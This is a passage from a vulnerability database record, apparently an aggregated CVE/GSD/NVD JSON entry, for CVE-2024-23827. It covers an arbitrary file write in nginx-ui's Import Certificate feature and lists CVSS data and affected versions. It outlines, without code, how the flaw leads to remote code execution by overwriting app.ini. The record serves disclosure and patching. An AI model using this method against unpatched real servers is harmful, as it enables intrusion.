cve-2024-23827
Vulnerability from cvelistv5
Published
2024-01-29 16:07
Modified
2024-08-01 23:13
Severity
Summary
Nginx-UI arbitrary file write through the Import Certificate feature
References
| Source | URL | Tags |
|---|---|---|
| security-advisories@github.com | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m | Third Party Advisory |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:13:08.227Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "nginx-ui",
"vendor": "0xJacky",
"versions": [
{
"status": "affected",
"version": "\u003c 2.0.0.beta.12"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It\u0027s possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-29T16:07:13.953Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m"
}
],
"source": {
"advisory": "GHSA-xvq9-4vpv-227m",
"discovery": "UNKNOWN"
},
"title": "Nginx-UI arbitrary file write through the Import Certificate feature"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-23827",
"datePublished": "2024-01-29T16:07:13.953Z",
"dateReserved": "2024-01-22T22:23:54.338Z",
"dateUpdated": "2024-08-01T23:13:08.227Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-23827\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-01-29T16:15:09.867\",\"lastModified\":\"2024-02-08T16:42:39.110\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It\u0027s possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue.\"},{\"lang\":\"es\",\"value\":\"Nginx-UI es una interfaz web para administrar configuraciones de Nginx. La funci\u00f3n Import Certificate permite la escritura arbitraria en el sistema. La funci\u00f3n no verifica si la entrada del usuario proporcionada es una certificaci\u00f3n/clave y permite escribir en rutas arbitrarias en el sistema. Es posible aprovechar la vulnerabilidad para ejecutar c\u00f3digo remoto sobrescribiendo el archivo de configuraci\u00f3n app.ini. La versi\u00f3n 2.0.0.beta.12 solucion\u00f3 el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"E5EB4B0D-CE6A-45CE-8971-15BBB0722394\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha2:*:*:*:*:*:*\",\"matchCriteriaId\":\"347055AA-23A7-4D03-A46B-0A51A0357EFB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha3:*:*:*:*:*:*\",\"matchCriteriaId\":\"9D17A6DA-3309-4029-9DAD-76ABAA1EA38A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha4:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E720E78-E724-4E65-9AFC-BC83E2B6405F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"0F445EB2-0B0B-44D1-9A6F-A23BB7CBA264\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"6D4CD22F-4078-4EA1-8790-D6FD110A2893\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"6FE185FE-3B3F-4E46-8812-2512B25E3AD7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"861646B0-3CD6-4037-9EE4-550B9B7E5FFA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.2.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A7D82994-E977-4148-9E6D-EB87E77EC702\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"B30244FF-039B-44F2-AC1A-5FDB7F98A2C5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"45F8125A-57BE-4E62-94A2-FBDD0BCB67E8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.1:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"73DB5C6F-0F75-44F4-B47F-44F3805C0E09\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.1:fix:*:*:*:*:*:*\",\"matchCriteriaId\":\"D9D6B6EA-823D-4D36-84DC-69CB14AA3120\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2B31BCF4-F00E-42E1-9BCA-F7C0D164FB7A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.3.3:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"B098A3C6-DFE3-41C5-AADB-52C36A08F566\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.4.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"5F5057DF-FA0A-4A41-BC6F-0F20529BACAC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.4.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"C7F7B02B-C43C-4E57-B844-F1708125BAB6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AF6CBAAD-0A17-4E43-965B-C525DADCA3F0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7EBA5C6E-25FC-4952-BA2C-6C44770D8861\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"BDA3575B-E64E-42AD-A12C-ADD2BD61065C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta1:*:*:*:*:*:*\",\"matchCriteriaId\":\"659E6E9F-A297-4115-884B-C4D7EE2CB155\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta2:*:*:*:*:*:*\",\"matchCriteriaId\":\"4E1A2B34-9B82-429D-83E4-951344B31CAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta3:*:*:*:*:*:*\",\"matchCriteriaId\":\"B43B60D3-743D-4965-B0FF-3FBDA3DFB7B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta4:*:*:*:*:*:*\",\"matchCriteriaId\":\"36DB77DA-4ED4-4800-8251-EB4F4BBA4A1B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta4_fix:*:*:*:*:*:*\",\"matchCriteriaId\":\"E9596AB0-0985-45A3-9EC4-4331A62E59D3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta5:*:*:*:*:*:*\",\"matchCriteriaId\":\"A7659CD3-117A-427A-BDAB-E9580D0CE0A6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta6:*:*:*:*:*:*\",\"matchCriteriaId\":\"8D398E64-80C0-4E7F-9BAB-37200FE42EFA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta7:*:*:*:*:*:*\",\"matchCriteriaId\":\"9CF56792-52E6-4A24-8488-8DBCE0DF2E69\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta8:*:*:*:*:*:*\",\"matchCriteriaId\":\"2D59E88D-CFF0-4039-A236-86AEFA9D6135\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta9:*:*:*:*:*:*\",\"matchCriteriaId\":\"F6C8AFA8-8F62-43A3-99E3-D2BA31B94AF0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ED48548E-A6AB-4AE7-B70F-540F13FA3171\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.5.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C645D38E-9AF7-4334-96B0-B674A2DD0E01\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"B3B50213-0F6A-4C86-A819-BC4CEC4CD6A6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.0:fix:*:*:*:*:*:*\",\"matchCriteriaId\":\"5EAB6269-238F-4342-BFF3-8D52E068A797\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"830987AC-8021-4898-B031-5D158A2EBFA5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C48387B2-B727-4184-9AEE-F2641F14B96F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8AF0BF25-8BBD-408E-AD26-2F5A5A7A8799\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0E90DD77-C9D3-418B-A77D-6B6513F1B2CD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F01E473A-7007-43B3-8801-4EDCB94433B3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BF5C23AA-D701-4153-A798-BC62D2227E4A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.6.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FD3E2589-AA3E-4FBD-9BE0-8C6343AA2D5F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"3F287D86-DE0B-4EFA-A59B-26142539F4C2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.0:patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"F6CA517E-298A-4594-A5C3-01D714B45FED\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E988C01A-A8E8-4A78-86FE-D479E85D1C57\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F3089766-C08D-46ED-96CD-FBD23918CE91\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7556CA53-63DB-456A-9F4F-D2216577214B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ED7D3809-15E2-46D7-B655-872D39516423\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"10DF1FCF-60F0-4E1E-B527-038D62D70061\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"692F6EB8-A3DA-41D4-ADC0-A62475056CCA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DB220C58-FEB5-4D00-856A-B8F02089EC69\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3F256AE5-04EC-4F8E-BBC4-76F16736E275\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.7.9:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C5878D75-96C7-44AB-8982-705FBC2A7825\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2B2FBE3D-3B56-4E56-8156-63FE4F1B8CF0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"00B0C7D6-30BF-4ABD-A72C-795D60DC5CC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DC05EA49-627E-4A40-ABB0-E590623C0B90\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"47930D99-B18D-4A65-B49E-060B661919E8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.4:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"6C3B1880-D8EB-40CA-B241-02B3C8B49869\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.8.4:patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"E7700F38-C7DD-4F86-B3DE-C3C9A28370A4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.9.9:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C994DA95-D877-4319-911A-90918A9C566F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.9.9-1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3AB27842-9235-4E3D-9E07-5DC873560D35\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.9.9-2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"598FBDD0-E019-4AA5-B561-65B4D1BE084A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.9.9-3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"489C42D9-39E2-4491-B318-18A20732ED62\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:1.9.9-4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0E801BBB-76D3-4873-A431-549FE7DE5451\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta1:*:*:*:*:*:*\",\"matchCriteriaId\":\"3C287A7F-66B4-406A-B87B-B954A1CA6D44\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta10:*:*:*:*:*:*\",\"matchCriteriaId\":\"D684FFEF-4451-49ED-A04D-CF74F45A2F40\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta10_patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"D5984B3A-40C9-4188-976C-E9EB166FA624\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta11:*:*:*:*:*:*\",\"matchCriteriaId\":\"EDE74B22-31D1-41D1-A5DD-DB4AAA7A7984\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta2:*:*:*:*:*:*\",\"matchCriteriaId\":\"25DD91AC-465B-4A43-A79F-4DE47243741C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta3:*:*:*:*:*:*\",\"matchCriteriaId\":\"115588C7-D947-4576-9E6C-B5AF1FCE9A29\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta4:*:*:*:*:*:*\",\"matchCriteriaId\":\"BBB20EA3-F3CF-42AF-A217-D5DF7A7ADD70\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta4_patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"81A6C732-FBF2-44A8-B810-456E54B59A09\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta5:*:*:*:*:*:*\",\"matchCriteriaId\":\"8C5664E5-150E-4B4B-BA0C-420738820FF1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta5_patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"7E764AA1-3060-441F-8F14-ADD165316741\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6:*:*:*:*:*:*\",\"matchCriteriaId\":\"04A3E84F-91AA-420A-B908-3393E037AC44\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6_patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"828EAE87-24E5-4F31-B301-BA2F96BDEA42\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6_patch2:*:*:*:*:*:*\",\"matchCriteriaId\":\"45710D36-954A-4450-B622-CB0F368DF544\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta7:*:*:*:*:*:*\",\"matchCriteriaId\":\"2B57EEFB-5518-4BD5-998A-34B6690A6F4C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta8:*:*:*:*:*:*\",\"matchCriteriaId\":\"8EDF4CEE-F24D-441B-92A8-7F5A2B41487E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta8_patch:*:*:*:*:*:*\",\"matchCriteriaId\":\"F0275FDF-BAE8-4909-8991-6FCE34B8905E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta9:*:*:*:*:*:*\",\"matchCriteriaId\":\"B52F973F-A2F2-40C2-9936-9447B5803CFB\"}]}]}],\"references\":[{\"url\":\"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]}]}}"
}
}
gsd-2024-23827
Vulnerability from gsd
Modified
2024-01-23 06:02
Details
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue.
Aliases
{
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2024-23827"
],
"details": "Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It\u0027s possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue.",
"id": "GSD-2024-23827",
"modified": "2024-01-23T06:02:22.070610Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2024-23827",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "nginx-ui",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 2.0.0.beta.12"
}
]
}
}
]
},
"vendor_name": "0xJacky"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It\u0027s possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-22",
"lang": "eng",
"value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m",
"refsource": "MISC",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m"
}
]
},
"source": {
"advisory": "GHSA-xvq9-4vpv-227m",
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"cve": {
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:-:*:*:*:*:*:*",
"matchCriteriaId": "E5EB4B0D-CE6A-45CE-8971-15BBB0722394",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha2:*:*:*:*:*:*",
"matchCriteriaId": "347055AA-23A7-4D03-A46B-0A51A0357EFB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha3:*:*:*:*:*:*",
"matchCriteriaId": "9D17A6DA-3309-4029-9DAD-76ABAA1EA38A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:alpha4:*:*:*:*:*:*",
"matchCriteriaId": "2E720E78-E724-4E65-9AFC-BC83E2B6405F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "0F445EB2-0B0B-44D1-9A6F-A23BB7CBA264",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "6D4CD22F-4078-4EA1-8790-D6FD110A2893",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "6FE185FE-3B3F-4E46-8812-2512B25E3AD7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "861646B0-3CD6-4037-9EE4-550B9B7E5FFA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A7D82994-E977-4148-9E6D-EB87E77EC702",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.0:-:*:*:*:*:*:*",
"matchCriteriaId": "B30244FF-039B-44F2-AC1A-5FDB7F98A2C5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "45F8125A-57BE-4E62-94A2-FBDD0BCB67E8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.1:-:*:*:*:*:*:*",
"matchCriteriaId": "73DB5C6F-0F75-44F4-B47F-44F3805C0E09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.1:fix:*:*:*:*:*:*",
"matchCriteriaId": "D9D6B6EA-823D-4D36-84DC-69CB14AA3120",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "2B31BCF4-F00E-42E1-9BCA-F7C0D164FB7A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.3.3:rc1:*:*:*:*:*:*",
"matchCriteriaId": "B098A3C6-DFE3-41C5-AADB-52C36A08F566",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.4.0:-:*:*:*:*:*:*",
"matchCriteriaId": "5F5057DF-FA0A-4A41-BC6F-0F20529BACAC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.4.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "C7F7B02B-C43C-4E57-B844-F1708125BAB6",
"vulnerable": true
},
{
